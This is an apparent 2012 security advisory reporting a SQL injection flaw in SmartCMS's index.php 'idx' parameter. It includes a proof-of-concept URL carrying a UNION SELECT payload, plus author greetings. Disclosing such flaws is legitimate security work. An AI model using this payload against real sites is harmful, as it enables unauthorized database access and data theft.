SmartCMS <= SQL Injection Vulnerability

Published
Credit
Risk
2012.11.26
NoGe
Medium
CWE
CVE
Local
Remote
CWE-89
N/A
No
Yes

===========================================

[o] SmartCMS <= SQL Injection Vulnerability

Software : SmartMS
Vendor : http://smartcms.nl/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/

===========================================

[o] Exploit

http://localhost/[path]/index.php?idx=[SQLi]


[o] PoC

http://localhost/[path]/index.php?idx=123+AND+1=2+UNION+ALL+SELECT+version()--

===========================================

[o] Greetz

Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
aJe kaka11 matthews wishnusakti inc0mp13te martfella
pizzyroot Genex H312Y noname tukulesto }^-^{

===========================================

[o] November 26 2012 - Papua, Indonesia

References:

http://smartcms.nl/
http://evilc0de.blogspot.com/
http://cxsecurity.com/issue/WLB-2011080175


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com